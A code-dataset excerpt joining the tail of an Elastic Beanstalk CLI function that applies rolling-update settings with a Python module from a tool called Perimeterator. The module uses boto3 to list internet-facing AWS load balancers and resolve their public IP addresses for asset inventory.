changes = [
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED,
'true'),
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_TYPE,
roll_type)
]
io.log_warning(prompts['upgrade.applyrolling'].format(roll_type))
else:
changes = None
if PlatformVersion.is_valid_arn(platform_arn):
commonops.update_environment(
env_name, changes, None, timeout=timeout,
platform_arn=platform_arn)
else:
commonops.update_environment(
env_name, changes, None, timeout=timeout,
solution_stack_name=solution_stack_name) | 1.78125 | 2 |
src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 0 | 10899 | ''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
import logging
import boto3
from perimeterator.helper import aws_elb_arn
from perimeterator.helper import dns_lookup
class Enumerator(object):
''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
# Required for Boto and reporting.
SERVICE = 'elb'
def __init__(self, region):
self.logger = logging.getLogger(__name__)
self.region = region
self.client = boto3.client(self.SERVICE, region_name=region)
def get(self):
''' Attempt to get all Public IPs from ELBs. '''
resources = []
# Iterate over results until AWS no longer returns a 'NextMarker' in
# order to ensure all results are retrieved.
marker = ''
while marker is not None:
# Unfortunately, Marker=None or Marker='' is invalid for this API
# call, so it looks like we can't just set this to a None value,
# or use a ternary here.
if marker:
candidates = self.client.describe_load_balancers(
Marker=marker
)
else:
candidates = self.client.describe_load_balancers()
# Check if we need to continue paging.
if "NextMarker" in candidates:
self.logger.debug(
"'NextMarker' found, additional page of results to fetch"
)
marker = candidates["NextMarker"]
else:
marker = None
# For some odd reason the AWS API doesn't appear to allow a
# filter on describe operations for ELBs, so we'll have to filter
# manually.
for elb in candidates["LoadBalancerDescriptions"]:
self.logger.debug(
"Inspecting ELB %s", elb["LoadBalancerName"],
)
if elb["Scheme"] != "internet-facing":
self.logger.debug("ELB is not internet facing")
continue
# Lookup the DNS name for this ELB to get the current IPs. We
# also need to construct the ARN, as it's not provided in the
# output from a describe operation (?!)
resources.append({
"service": self.SERVICE,
"identifier": aws_elb_arn(
self.region,
elb["LoadBalancerName"]
),
"cname": elb["DNSName"],
"addresses": dns_lookup(elb["DNSName"]),
})
self.logger.info("Got IPs for %s resources", len(resources))
return resources
| 2.640625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.